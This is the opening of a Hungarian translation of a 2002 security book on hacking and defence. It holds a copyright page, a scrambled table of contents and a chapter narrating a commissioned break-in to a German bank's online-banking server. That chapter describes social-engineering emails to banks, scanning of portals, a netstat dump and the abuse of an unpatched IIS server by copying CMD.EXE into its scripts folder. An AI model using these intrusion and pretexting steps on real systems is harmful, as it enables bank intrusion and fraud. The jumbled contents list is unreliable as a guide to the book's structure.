Thomas Vosseberg

Feltörés kontra védelem
Fontos figyelmeztetés!
A szerző a könyv teljes tényanyagát a legnagyobb gonddal dolgozta ki, illetve állította össze, és hatékony ellenőrzések mellett készítette. A hibák ennek ellenére sem zárhatók ki, ezért a kiadó és a szerző kénytelenek felhívni a figyelmet arra, hogy hibás közlésekre visszavezethető következményekért sem garanciát, sem jogi vagy bármilyen értelemben vett felelősséget vagy jótállást nem vállalnak. Az internetcímek vagy a verziószámok a szerkesztés lezártakor rendelkezésre álló állapotot tükrözik. A kiadó és a szerző semmilyen felelősséget vagy garanciát nem vállal a változásokért, amelyek tőlük függetlenül fellépő körülményekből adódnak. Az esetleg letöltésre kínált fájok és információk kizárólag nem üzleti felhasználásra szolgálnak. Üzleti felhasználás csak a licenctulajdonos beleegyezésével lehetséges. © 2002 Franzis1 Verlag GmbH, 85586 Poing © 2002 Computer Panoráma, 1091 Budapest, üllői út 25. Felelős kiadó: Dely Tamás ügyvezető igazgató Felelős szerkesztő: Horváth Annamária Fordította: Murányi Eszter Tervezőszerkesztő: Dancs Katalin Címlapterv: Szincsák László Minden jog fenntartva. Jelen könyvet, illetve annak részeit tilos reprodukálni, adatrendszerben tárolni, bármely formában vagy eszközzel - elektronikus, fényképészeti úton vagy más módon - a kiadó engedélye nélkül közölni. A kötetet készítette: Levilágítás: HVG Press Nyomtatás és kötés: Szegedi Kossuth Nyomda Kft. 6723 Szeged, Makkosházi krt. 1. Felelős vezető: Gera Imre ügyvezető igazgató
ISBN: 963 7639 225

Tartalom
1. A BANK-HACKELÉS 1.1 A feladat 1.1.1 Feltételek 1.1.2 A megoldáshoz vezető út 1.2 Hozzáférési út - információszerzés a Social Engineering módszerrel 1.3 A megfelelő cél keresése 1.3.1 Takarékpénztárak - túl sok szerverellenőrzés 1.3.2 Kutatás: IIS szerver kerestetik 1.3.3 Az operációs rendszer és a tranzakciós szoftver 1.3.4 Hogyan védik a szervert? 1.3.5 Nincsenek logfájlok - ezt biztosan az OFX irányítja 1.3.6 Adatátadás scriptekkel 1.3.7 Az adatletöltés 1.4 Utóirat a bank-hackeléshez 1.5 Összefoglalás 1.6 Sajtóbeszámolók 1.7 Tapasztalatok más bankoknál 1.7.1 Forgatókönyv a takarékpénztár-területen 2. A WINDOWS-RENDSZEREK (9X, NT, 2000) GYENGE PONTJAI 2.1 A hackeren túl - merevlemez-fejreállás, adatbetekintés vagy lopás 2.1.1 Különbségek a Windows 9x, az NT és utódai között 2.1.2 A fizikai támadás 2.1.3 Képernyővédő - jelszó - a bennfenteseknek nem okoz problémát 15 16 16 17 18 20 20 21 22 23 26 26 28 29 29 30 33 33 37 38 39 39 42

2.1.4 Automatikus lejátszás - a betörés előkészítése CD-vel
2.2 A jelszavak kikémlelése 2.2.1 Érdekes jelszavak szinte mindenütt akadnak

44
47 47

2.2.2 A jelszófájlok
2.2.3 Jelszavak a Windows 2000 alatt 2.3 A távoli elérésű támadás - internet- vagy hálózati felhasználók, vigyázat! 2.3.1 A fájl- és nyomtatómegosztás - veszélyes biztonsági rések 2.3.2 Mik azok a szkennerek, és hogyan működnek? 2.3.3 Milyen lehetőségeik vannak a betolakodóknak?

49
51 52 53 54 56

2.3.4 2.3.5

Jelszóval védett megosztások BruteForce-rohamok a megosztási jelszavak ellen

57 57
58 59

2.3.6 Óvintézkedések 2.4 További támadási technikák 3. ALAPOK

3.1 Az anonim Internetezés csökkenti a kockázatot 3.1.1 A legtöbb felhasználó sokat elárul 3.1.2 Névtelenül
3.2. A TCP/IP 3.2.1 Mi a TCP/IP?
3.2.2 Különböző protokollok a rétegekben 3.3 Néhány alkalmazás és protokoll használata és a biztonságosságuk 3.3.1 A Telnet

61 62 63 65
68 68
70 80 81

3.3.2 Az FTP 3.3.3. Az IRC
3.3.4 3.4 4. 4.1 4.2 4.2.1 Az IP-címzés Aportokról A TRÓJAIAK A történelmi minta Miből áll egy trójai? A szerver kiosztása

82 84
85 87 91 92 92 93

4.2.2 4.2.3 4.3 4.3.1 4.3.2 4.3.3 4.3.4 4.3.5 4.3.6 4.3.7 4.4 4.4.1 4.5 4.5.1 4.6 4.6.1 4.6.2 4.6.3 4.6.4

A kliens otthon marad, és vezérli a szervert Hogyan szerzik meg a hackerek az IP-t? így álcázzák és terjesztik a trójaiakat A trójaiakat fájlokba integrálják Álcázás a WinZip-pel. A trójaiakat az ICQ-val is tovább lehet adni Elég egy CD és az automatikus lejátszás funkció A lemezek majdnem ugyanígy működnek További terjesztési stratégiák Mit csinálnak a hobby-hackerek a trójaiakkal? Sub7 - egy trójai rémisztő lehetőségekkel Támad a Sub7 BackOrifice 2K - Hálózati eszköz vagy támadás a Microsoft ellen A BO2K és összetevői így ismerjük fel a trójait a rendszerünkben Vírus- és trójai-szkenner AutoRun bejegyzések Windows-Registry - ez már izgalmas Módszerek az Explorer.exe-vel a C:\ meghajtóra

94 95 96 96 97 98 99 100 100 101 102 103 105 106 107 107 108 109 112

4.6.5
5.

A runonce.exe kicserélése
VÍRUSOK - VESZÉLYES FÁJLOK

112
113
115 116 117 117 117 118 118 119 119 119 121 121 122 122 122 124 124 124 125 125

5.1 Alapok 5.1.1 Defektes cluster mint álcázás 5.1.2 Miről ismeri fel a vírusvizsgáló a vírust? 5.1.3 Videokártyák - az elvetemült támadók búvóhelyei? 5.2 A vírus felépítése 5.3 Hogyan fertőz meg a vírus egy fájlt? 5.3.1 így fertőznek a bootszektor vírusok 5.3.2 A dropper vírust helyez el 5.4 A legfontosabb vírustípusok rövid áttekintése 5.4.1 Bootszektor vírusok 5.4.2 Companion vírusok 5.4.3 Killerprogramok 5.4.4 Logikai bombák 5.4.5 Makrovírusok 5.4.6 Hálózati vírusok 5.4.7 Polimorf vírusok 5.4.8 Stealth vagy rejtőzködő vírusok 5.4.9 A TSR fájlvírusok 5.4.10 Update vírusok 5.4.11 Férgek - az ILOVEYOU és társai

5.4.12 Időzítők
5.5 Word makrovírus írása 5.5.1 Minden ténykedés központja - a Normal.dot fájl 5.5.2 Modul vagy osztálymodul? 5.5.3 Vírusok kontra ServiceRelease 5.5.4 Modul makrók 5.5.5 Ilyet is lehet: a vírus egy Payload-ot hív meg 5.5.6 A vírus fájltulajdonságokat vagy szövegtartalmakat változtat meg 5.5.7 A vírus jelszóval védi a fájlt 5.6 Megfertőzött osztálymodulok

126
126 126 127 127 127 131 132 133 133

5.7

ILOVEYOU

137
138 138 140 140 149 149 150

5.7.1 Mi az a féreg? 5.7.2 A működési mód 5.7.3 Hogyan tudott a féreg elterjedni? 5.7.4 A forrás - kommentárokkal 5.8 Hogyan működnek a vírusvizsgálók? 5.8.1 Szkennermodul 5.8.2 Víruspajzs

2.3.4.4.a „nuken" 10.túlcsordul a postafiók 8.Distributed Denial of Service támadások 10.4 6.8 DDoS .2 7.3 Astack (magyarul: halom/rakás) 11.8 6.4.7 6.3 7.2 Hogyan működik egy sniffer? 9.8.1 7.3 7. BUFFER-OVERFLOW 11.1.1.1 Az ICQ . SNIFFER 9.3 A ConCon bug 8.2 Félig nyitott TCP-szkennelés 6.8.5 TCP-Syn-Flooding 10.2.4 7.2 A fájlmelléklet kitömése 8.4.1.1 Hogyan lehet ezt kihasználni? 165 167 168 168 170 172 174 175 176 181 182 182 184 184 187 188 189 190 190 191 192 192 192 193 195 196 197 197 197 197 198 .7 Smurf 10.6 A jelszófájl 8.2 Szkennelési eljárások 6.6 Ping-Flodding 10.1.1.6 6.praktikus és veszélyes 8. TÁMADÁSOK AZ INTERNET-FELHASZNÁLÓK ELLEN 8.4 „Fertőtlenítő" A vírusvédő program kiválasztásának a szempontjai 150 150 6.2.3 Large Packet-támadások avagy a Ping of Death 10.2.9 Védelem a DoS-támadások ellen 11.2 Milyen biztonsági rések vannak? 9.jelszófeltöréssel ez is lehetséges Mire kell ügyelni a felhasználói oldalról? A jelszófeltörők Ismert felhasználói nevek jelszavainak a kitalálása A beállítások egy áttekintésben Jelszavak megfejtése a John the Ripperrel Single Mode A szólista módszer Incremental mód Extemal mód A John legfontosabb parancsai 157 158 160 161 162 162 163 163 164 164 165 165 7.2.3 5. A DENIAL OF SERVICE TÁMADÁS 10. 7.A RÉSEK KERESÉSE 151 152 153 153 153 6.4. SZKENNELÉS .1 7.2 7.4 Land támadások 10.4 7.2.2.5 JELSZÓFELTÖRÉS Hackelt security-site .1 Az IP-spoofing mint előfeltétel 10.1 7.1 Szöveg 11.2 ICQ .2.3 TCP-FIN-Scan 6.2.3.1.2 A Buffer-Overflow-támadások 11.2.biztonsági kockázat? 8.2 Adatok 11.1 E-mail-támadások 8. A szkenner 6.9 Fragmentált szkennelés UDP-lCMP-Port-Unreachable szkennelés UDP-Recvfrom-And-Write szkennelés ICMP-echo-scanning/ping-szkennelés A nyitott portok csak a kezdetet jelentik A portszkennelés elleni védelem 154 154 154 155 155 155 152 7.2 Out-of-Band csomagok .1.1 Az operációs rendszer memóriakezelése 11.5 6.2.5.3 A sniffer veszélyei 9.1 Mi az a sniffer? 9.1 Mailbombák .4 Mit lehet tenni a snifferek ellen? 10.2 7.4.1 Szkennelés teljes TCP-kapcsolattal 6.2.

cgi 12.4 Jelszóval védett webterületek megtámadása 12.2 Védelem a desktop tűzfallal 231 232 233 234 235 236 237 239 240 . BIZTONSÁG A WEBEN 213 214 217 221 221 222 224 12.2 Hogyan működik? 11.4.2 Védelem 12.11.1.3 BBS biztonság 12.2 Hitelkártya fake-ek 12.5.2 A tűzfalak kategóriái 13.3 Tűzfal-koncepciók 13.5 Milyen védelmi mechanizmusok vannak? 11.2.1 Egy desktop tűzfal megtámadása 13.2 Desktop tűzfalak 13.1.1 A tűzfal biztonsági szempontból fontos összetevői 13.4 Honnan lehet felismerni a Buffer-Overflow-t? 11. TŰZFALAK 13.1.3 Minek kell a Shellcode változónál állnia? 11.1 A CGI további ismert gyenge pontjai 12.1 Védelem 12.1 CGI-scriptek biztonságossága 12.6 Hogyan védhetjük meg a webszervert? 225 226 227 229 13.2.1.count.3 Áldozat a Buffer-Overflow-kért 11.4.a „script kidek" nemzeti sportja 12.1.1 A tűzfal feladatai 13.1 Összefüggés a CPU és a Buffer-Overflow között 11.1.4 Hogyan ismeri fel a támadó a tűzfalat? 13.2 Látogatásszámláló résekkel .5 Defacement .5.2.2.2 A Buffer-Overflow-k és a tűzfalak 199 202 208 209 211 212 212 12.

.....2 A megoldáshoz vezető út A dolog a következőképpen zajlott: 1... mennyire biztonságos manapság az online banki ügyintézés Németországban........................16 1..........23 1..jogi megfontolásokból ....... amelyről ebben a fejezetben írunk. • Mindennek észrevétlenül kellett történnie. • Trójai elhelyezése a homebanking-ügyfeleknél...................3......20 1........ így a támadás ennek a könyvnek a megjelenésekor már nem ismételhető meg.3 Az operációs rendszer és a tranzakciós szoftver 22 1.....16 1..1... hogy az végrehajthatatlanná váljon.... Manipulálni kellett a tranzakciókat. és fel kellett deríteni a manipulációs lehetőségeket........33 1. 1....3....... 1.......6 Adatátadás scriptekkel..........................1..3.ezt biztosan az OFX irányítja ..3..7..... 2... 26 1.1 Takarékpénztárak-túl sok szerverellenőrzés..... amelyeket a homebanking során végrehajtanak? Van-e lehetőség. 3.5 Nincsenek logfájlok .. Két lehetséges indítás jutott a csoport eszébe: • Az intézmény webszerverének a megtámadása..29 Sajtóbeszámolók........ A biztonság kérdését kétféleképpen lehetett megközelíteni: « Mennyire védettek az ügyfelek adatai. a bank nevét a szerzők .. s az ARD Technikai Tanácsadó műsor keretében kellett ellenőrizni..... manipulálni........ Ez azt jelentette....2 Kutatás: IIS szerver kerestetik . Az érintett intézmény a „betörés" hatására ugyan változtatott online banking rendszerén...... 4............. . Meg kellett találni a hozzáférési utat az adatokhoz vagy a szerverhez..... és ezt követően a banki szerver megtámadása a . ám mivel a potenciálisan fenyegető károk még most is jelentősek lehetnek.... 26 1................. vannak-e lehetőségek betörni egy banki szerverbe? • Mennyire biztonságosak a tranzakciók..20 1..letakarták..........információszerzés a Social Engineering módszerrel___18 A megfelelő cél keresése...... 28 Utóirat a bank-hackeléshez 29 Összefoglalás.................. adatokat lekérdezni.....4 Hogyan védik a szervert?............1 Feltételek...1 Feltételek A feladat természetesen bizonyos feltételekhez volt kötve..........1.. fejezet ... átirányítani stb. hogy egyetlen tranzakciót sem lehetett úgy manipulálni vagy hamisítani................................... Ezek közé tartoztak: « Egyeden ügyfelet sem érhet kár...... A támadás visszhangja a könyv szerzőjére nézve mindenképpen pozitív volt...................2 A megoldáshoz vezető út.30 Tapasztalatok más bankoknál........ csak a bank jött ki rosszul az ügyből.....? 1......7 Az adatletöltés.............. Ki kellett kémlelni az adatokat..3.........1.. ........................ • A bank online rendszerét nem lehetett sem zavarni....Tartalom A feladat.17 Hozzáférési út ..........1 Forgatókönyv a takarékpénztár-területen...21 1.. nehogy az érintett bank az adás sugárzása előtt ideiglenes intézkedéseket tegyen..1 A feladat 2001 júniusában érdekes feladatot kapott egy fiatal hacker-csoport: banki rendszereket és elektronikus kártyákat kellett tesztelniük..1...3...33 1 A bank-hackelés Rövid ideig az érdeklődés középpontjába került egy különös támadás egy németországi bankszerver ellen...... sem korlátozni a működésében... hogy megakadályozza a hiányosság nyilvánosságra kerülését. Be kellett törni a rendszerbe.......3...

át kell játszani nekik egy trójai vírust. nem utolsósorban a (német) Btk. enged át kéréseket.kikémlelt ügyféladatokkal. amely csak a 443-as portot (HTTPS-kódolású adatátvitel SSL-lel) bocsátja rendelkezésre. A plug-gateway tűzfala minden csomagot analizál. Először tehát információkat kellett gyűjteniük. majd a megfelelő pillanatban. illetve védett-e az online banki szolgáltatása.információszerzés a Social Engineering módszerrel Mindenekelőtt személyes kapcsolatokon keresztül próbáltak információkat szerezni a bankszerverről. amikor az ügyfél online intézi banki ügyeit. hogy aligha lehetne végrehajtani a tulajdonképpeni tesztet. Az egyszerűbb természetesen a régi jó trójaihoz való visszanyúlás lett volna: néhány PC-t kikémlelni. amelyek online portált működtetnek. lecsapni. hogyan is védi a bank az online ügymenetet és az ügyfelek adatait. Az ÖN XY bankja. S ha egy ilyen akció kitudódna. Ráadásul egy ilyen indítást állandóan felügyelni is kell. hiszen többnyire maga sem tud róla semmit. Először tájékozódni kellett a banki struktúráról. A megfelelő lehetőséget tehát csak egy pénzintézet webszerverének a feltörése jelenthette. hiszen talán csak kisebb hiányosságokra bukkannak. az alábbi mail érkezett. Ügyfeleket kell találni. A plug-gateway. integrált tűzfallal. Így az ügyfelek banki adatainak az átvitele az online banking oldal betöltésétől kezdve biztonságos és kódolt. hogy a felépítése miatt ne tudjanak egy szabvány ügyfélszolgálati szöveggel válaszolni rá. Ezt a mailt elküldték 10 nagy német pénzintézetnek. a pénze sehol sincs nagyobb biztonságban. Intrusion Detection System is található. Néhány terepkísérlet után azonban ez a lehetőség a hajánál előrángatottnak tűnt. jelzi és vissza is veri a rendszer elleni támadásokat. Éppen ezért hálózattech-nikailag jártasnak mutatták magunkat. hogy valójában mennyire van biztonságban ennek az intézménynek a pénze. és csak a szűrőszabályok (csak HTTPS elérések engedélyezettek) teljesülése esetén továbbítja az online banki rendszer webszerverére. 202. A Cisco router mögött még egy exkluzíván az XY bank számára installált. 1. Körülbelül 5 nap és 9 „Aggodalomra semmi ok. §-aira való tekintettel." típusú szabványmail után. amelyeket nyugodtan fel lehet mutatni. amelyben ügyfélnek adták ki magunkat. vagy pedig gyanút fog. és most tudni akarja a saját bankjáról. a szerzőket is meglepve. és végezetül szenvtelenül megkérdezték. installálni kell a trójait stb. A mailt úgy kellett megírni. Végülis arra a döntésre jutottak. Továbbá az . Azonban a saját ügyféltanácsadót kérdezgetni bankja szerverének részleteiről nem túl szerencsés. amely a Cisco router és a bank szervere között található. hogy semmilyen visszacsatolás nem lehetséges kívülről a külső rendszerre. a következő feladatokat látja el: Az internetkapcsolat és a webszerverhez kapcsolódás fizikai szétválasztása: egy külső rendszertől induló kapcsolat felépítésénél átveszi a kapcsolatot. és csak az exkluzíván az online banki rendszer elé kapcsolt pluggateway-en. annak olyan sajtóviszhangja lenne. aki hallott egy másik bank webszerverét ért hackertámadásról. amely naplózza. 1. Az infrastruktúra Az XY bank online banki rendszerének infrastruktúrája a következők szerint van kiépítve: Valamennyi online banking megkeresés egy Cisco routeren keresztül érkezik.2 Hozzáférési út . Természetesen egyik résztvevőnek sem volt pontos koncepciója. hogyan is néznek ki pontosan a banki rendszerek. és az internetről jövő kapcsolattól fizikailag elválasztott kapcsolatot állít elő a webszerverhez úgy. Több banknak e-mailt írtak. mint nálunk. és azt sem tudták. Ez természetesen heves vitákat váltott ki. Más megoldást kellett tehát találni. és 263. hogy egyszer azért megpróbálkoznak vele. hiszen a kikémlelés után várni kell az első homebanking tranzakcióra.

amelynek a szervere közvetlenül csatlakozik az online banking-hez. Mint várható. Hannoverben található. 3. de a tulajdonképpeni oldal. azonban néhány szkennelés (közelebbit ld. és semmilyen visszacsatolást nem engednek meg a valójában felhasznált PIN-re. Itt van példának a www. Takarékpénztárak . és ki lehetett indulni abból. Ennek az oldalnak a szervere Schwerinben van. így az adatbázist egyáltalán nem lehet közvetlenül elérni az internetről.finommunkák Ami a mail-bői nem derült ki. A PIN-ek kódolva vannak tárolva az adatbázisban. Mivel a keresett formátumból tulajdonképpen nem sok volt. hóban maga hajtott végre szkennelést a nyitott internetfellépés és a bank online rendszere ellen. Részletek a szerverekről . Egy támadás itt egy kicsit melegnek tűnt. hogy nincsenek-e esetleg kódolva ezek stb. nem sikerült.hotnebanking-mecklenburgvorp. port) a 128 bites kódolású. Miután ezekről a szerver-kliens szoftverekről csak szűkös információkat találtak.cgi/Ostseespk_Rostock. Ezek gondoskodnak a számlaszámok és a PIN-ek belépő ellenőrzéséről. arra a módszerre amelynek révén részletes bepillantást nyerhettek a banki webszerver biztonsági intézkedéseibe. világossá vált a számukra. Biztonság Az infrastruktúra (hardver és rendszerszoftver szinten) megfelelő védettsége érdekében még a következő biztonsági intézkedéseket tettük az online banki ügyintézésnél: A kliens és a szerver közötti kapcsolat 128 bites maximális kódolással épül fel.06.de.3. A kísérlet. hogy minden egyes bankot megvizsgáltak. hogy keresnek egy nagyobb bankot. hogy az adminek „a gépen ülnek". mert például Hannoverben majdnem minden takarékpénztárat ÉszakNémetországból hostolnak. például az OFX-et (Open Financial Exchange). ám az onlinebanking egy számítógépközponton keresztül zajlik. 06. azzal kezdhettek. operációs rendszer. szerver stb. ahol az ügyfelek a számlájukhoz férnek. Az adminisztrátor 2001. az online banki rendszer csak HTTPS-en keresztül (443.de/cgi/anfang.). hogy csak egy bank login oldaláról juthatnak hozzá az ügyfelek adataihoz. továbbra is tisztázatlan. hogy lássák a szervereiket.túl sok szerverellenőrzés A német takarékpénztárak az infrastruktúrára vetett rövid pillantás után kiestek. hogy további információkat tudjunk meg a rendszerről (hardver. A hackeléshez tulajdonképpen csak egy Microsoft HS-szerver jöhetett szóba. és már egy tesztcélú szkennelés is figyelmet keltene.3. 1.ostspa.2 Kutatás: US-szerver kerestetik így tehát inkább a nagyobb bankokra kellett összpontosítani. hogy ugyan majdnem minden takarékszövetkezetnek van saját weboldala. a következő cím alatt fut: https://ww2. és ott úgy változtatják meg a login-oldalakat. 2. Ez a szabvány az internetes tranzakcióknál biztonságos. A részletes információk szkennelése .1. A kérdés csak az volt. Még ha lehetséges is lenne adatokhoz jutni az OFX-adatbázisból. biztonságos internet-eléréssel érhető el. miközben ez a szerver a DVG-nél. 1.3 A megfelelő cél keresése Az ötlet tehát az volt. melyik bank legyen az? 1. később) eredményeként már világos volt: minden bank különböző pénzügyi szoftvereket használ. hogy minden bevitel egy log-fájlba vándoroljon. és kezelik a további ügyfélinformációkat. Ez egy jól sikerült példa volt a Social Engineeringre. Szkenneltek néhány bankot.adatbázis szerver fizikailag el van választva a webszervertől és az alkalmazástól. Az volt ugyanis a probléma velük. havi biztonsági analízise A rendszeradminisztrátor 2001.

6. hogy sikerrel járnak. lehetséges. mert nem válaszolt a pingekre.az előkészítés feltételei A cél optimálisnak tűnt. Tivoli Management Software-rel karbantartva (amelynek a hibáiról lehetett már hallani)! De ezt ezen a szerveren nem ellenőrizték. Utólagos becslések szerint az említett szám 5000 és 9000 között mozgott óránként. a szerver tervezett átépítése volt. 5. amely a parancsok dekódolását érintette. mert egy végzetes rés a IIS-en. 3. és kapcsolatokat sem engedett meg . tökéletesen elegendő volt.) Napokig tartó szkennelés után találták meg a ••• oldalt. mint egy leányvállalat. 2. hogy megtalálják a betörésre alkalmas rendszert. 1. mint magáé a rendszeré. Hitelesíteni. amelyen keresztül úgy a bank. A támadáshoz a következő lépéseket kellett végrehajtani: 1. amely e bank mellett szólt. Feltérképezni az operációs rendszert és a tranzakciókhoz használt szoftvert. és a még futó régi rendszert „elhanyagolják".3. egy portált. Kikutatni az adatátvitelt. a szervert tűzfal védi. 4.3. A bank minden szakembere az új projekten dolgozik. Ellenőrizni a védelmi mechanizmusokat.3 Az operációs rendszer és a tranzakciós szoftver Egy NT-webszerver IIS 4. fejezetben részletesen is olvashatnak. (A szkennelés témájáról a 6. 1. a ••• ügyfelei be tudtak login-olni. úgy az oldalé.4 Hogyan védik a szervert? Úgy tűnt. Tehát abból indulhattak ki. mert e bank ügyfeleinek egész Németországban erről a portálról kellett bejelentkezniük. A program szállította a legfontosabb információkat az egyes bankok és takarékpénztárak webszer-vereiről. Tesztelni az exploitokát. Ellenőrizni. így a webszerver megtámadásának az időpontja több mint ideális. így az oldal elérési számainak is magasnak kellett lenniük. Egy további érv.0-val. A cél ismertetőjegyei . hogy vannak-e logfájlok információkkal.Itt láthatók az infók a felhasznált szerverekről A szkennelő program segítségével különböző bankportálokat vizsgáltak.

27.0.xx:138 1 72. 152.130.166.0.191:1042 212.0.0.209.24.27.153.0.0.4.209.xx:139 193.0.0:0 0.24.1 58.0.1:1025 127.0.0. hogy a webszolgáltatón (80.130.209.130.xx:443 193. 209.xx6.0.209.158.0.0:2867 0.0.0:0 0.0.0.0.0:0 0.0:161 0.0.0.0:2882 0.0:0 0.0.xx:80 193.0.0.0.0.24.27. A szkennelések során nem derült ki pontosan.24.209. intranet kapcsolatból indulhattak ki. TCP Helyi címek 193.213:1236 62.1:1028 127.0:3111 0.0:0 0.130.5:1435 172.209. de ezt kizárni sem lehetett.0:3128 0.0:0 0.158.xx:80 193.xx:137 193.xx:80 193.0.209.0.0.0.209.0.24.158.xx:80 193.213:1237 62.xx:80 193.0:0 0.0.213:1240 Állapot TIME_WAIT .xx:80 193.0:1037 0.0:3697 0.3:1036 62.0.0.24.24.0.0. 152.0:5044 127.209.5:1435 172. mert a netstat-jelentés 4:00 óra körül kapcsolatokat mutatott a 4966/4967 portra.24.166.209.0.0.0:0 0.0.24.0.27.0.158.0.197.0.xx:443 193.0.0.0.0.206.0:2874 0.xx:443 193. és azt sem lehetett megmondani.0.0.0:3125 0.0.211:4233 62.xx:80 193.209.211:4232 62.158.xx: 139 1 72.0:0 0.0.27.0.0.0:4796 0. 152.0:0 172.0.0.158. 158. xx:3125 172.24.0. Helyi címek TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP 0.0.0:0 Állapot LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING ESTABLISHED LISTENING LISTENING ESTABLISHED LISTENING LISTENING LISTENING LISTENING ESTABLISHED TIME_WAIT ESTABLISHED TIME_WAIT TIME_WAIT LISTENING TIME_WAIT TIME_WAIT ESTABLISHED ESTABLISHED ESTABLISHED ESTABLISHED ESTABLISHED ESTABLISHED ESTABLISHED LISTENING LISTENING LISTENING LISTENING CLOSING TIME_WAIT TIME_WAIT TIME_WAIT TIME_WAIT TIME_WAIT TIME_WAIT TC P TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP 0.213:1235 62.0.209.xx:443 193.2.1 58.0:4487 0.0:1031 0.0:3489 0.158.0.61:1119 212.0.0.0:3038 0.0.209.0.0. Íme a netstat-jelentés: Prot.209.0.0:135 0.236:57480 193.0. port) és a HTTPS-en (443.158.0.158.46.1:1025 0.152.xx:3126 172.0:0 0.144:1073 217.130.0.0.213:1182 62.158.0. xx:443 193.1:1031 1 72.27.0.4:80 172.0.xx:138 193.0.xx: 1029 172.0.0.213:1233 62.1:1031 0. 209.0:0 0.158.133:4233 0. 152.145.0:0 0.0. port) kívül más portok elérése is megengedett-e.24.0.0.5:1435 0.1:1026 127.0:0 0.0:0 0. milyen tűzfalról volt szó.0.158.xx:80 193.0.27.0:0 62.0.0.0.0:0 0. 152.157.209.xx:3127 193.0.0.24.0:0 0.197.xx6.209.0.0:1027 0.0.0.0:3168 0.0.xx:443 193.0.0:512 0.0.130.0.0.0.0.0.xx:31 11 172.158.46.153.0.0.0.0:0 0.0.213:1234 62.209.4:1557 212.158.0.0.27.0. Mivel a távoli számítógépet egy komputernévvel jelölték.152.0.xx: 137 172.158.0:0 0.153.0.0:0 0.xx:443 Távoli címek 0.0:135 0.153.0:3037 0.xx:443 193. xx:3038 1 72.0:0 0.0:0 127.0.158.0:0 62.209.27.0.0.kifelé.0.0.0:0 127. 133.0:0 0.0.0.130.0.4:80 172.24.0.209.0.24.158.158.xx:443 Távoli címek 62.197.0:0 0.0.0:0 0.0.213:1238 Prot.xx:80 193.xx:80 193.0:0 0.0.1 52.0:0 0.0.0:0 0.0.0.130.158.0.0.0.209.0:0 0.1:1025 127. 152.153.0.101.158.

xx6.209. és ezt éri el. Előkészületek (hozzáférés megszerzése) A megfelelő URL megadásával elérték a hozzáférést.0.EXE-t a webszerver rendszerkönyvtárából a script-könyvtárba másolták. 209.27. és ott hasonlítják össze.24.xx:443 193.xx:443 193. a PIN és a felhasználó által megadott TAN az OFX-hez továbbítódik.xx:443 193.209.xx:443 193.0:0 193.158.158.27.27.158.27.19.0.19.xx:443 193.xx: 11 94 62.xx:138 193.xx: 1030 193. Találtak viszont OFX-szoftver-jelentéseket. hogy vagy a tűzfal log-okat értékelik ki.19.209.xx6.152.1 58.xx:3121 193.213:1242 62.158.153.xx:1186 62.158.213:1245 62.11.209.TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP UDP UDP DP UDP UDP UDP UDP UDP 193.130.xx:443 193.xx:443 193. Feltételezték. 209.1 58.27.158.xx:443 193.209.27.1 58. 152.209.0.xx:1030 62. milyen módon lehetne megtámadni a szervert.xx:443 193.54.1 58.158.209.27.209. Tehát a tranzakcióknál a tranzakciók számai.xx:443 193.158. sem adatbázis-jelszavakat vagy hasonlókat nem találtak.3.3:1037 62.xx:443 1 93.5 Nincsenek logfájlok ezt biztosan az OFX irányítja IIS logfájlokat egyáltalán nem találtak.153.24.xx:443 193. hogy működőképesen legyen kezelhető a .xx:3128 0. sem máshol. vagy teljesen lemondanak a loggolásról! Az OFX-ről A szerveren sem folyószámla-adatokat.209.158.158.209.xx6.xx6.213:1247 62.3.158.130.209.158.xx: 1202 0.158.130.130.158. a felhasználói adatokat egy adatbázisba küldik.158.56.153.3:1039 62. 154.xx:443 193.3:1038 62.xx6.xx:443 193.19.209.xx:443 193.xx6.xx:1182 62.209.158.209.xx:137 172. és az adatokat nem lokálisan ellenőrzik.130.27. Az OFX-et az ASP-oldalakról . amely aztán visszaadja a hibakódokat.vezérlik.209.213:1243 62.24.158.3:1040 62.xx:443 193.3:1041 62.158.158.xx:137 193.xx:2326 63.1 58. 209.130.152. amelyek azonban nem adtak információt a kapcsolatokról.xx:443 193.158.209. hanem JAVA scripteket használnak .27.amelyek szokatlan módon nem VB scripteket.209.xx:443 193.xx:443 193.xx:443 193.xx:1184 62.24.27.165.0. xx:443 193. Ebből továbbra is arra következtettek. xx:443 193.59.xx:138 1 72.0.xx:3128 209.213:1244 62.27.209. 1.153. sem a C:\WINNT\ system32\LogFiles könyvtárban.xx6.3:1043 62.27.158. 209.209.209.xx6. xx:1277 193.213:1241 62.3:1044 62.xx:1185 62.56.209.158. A parancsfordító CMD.209.1 58.209. hogy ezeket központilag tárolják egy számítógépen. 152.209.158.209.xx:443 193.xx:443 193.158. hogyan is fogadja és továbbítja a rendszer az adatokat bejelentkezéskor. Természetesen pontosan megnézték.152.0.xx6.0:135 0.27.209.24.xx:443 *:* *:* *:* *:* *:* *:* *:* TIME_WAIT TIME_WAIT TIME_WAIT TIME_WAIT TIME_WAIT TIME_WAIT TIME_WAIT TIME_WAIT TIME_WAIT TIME_WAIT TIME_WAIT TIME_WAIT TIME_WAIT TIME_WAIT ESTABLISHED CLOSING TIME_WAIT TIME_WAIT TIME_WAIT TIME_WAIT TIME_WAIT CLOSING TIME_WAIT ESTABLISHED CLOSING LISTENING ESTABLISHED *:* 1.3:1042 62.xx: 1029 193.27.158.213:1246 62. illetve kezeli az OFX szoftver.0:161 172.130.27.xx:443 193. 209.6 Adatátadás scriptekkel A szkennelés után világos lett.

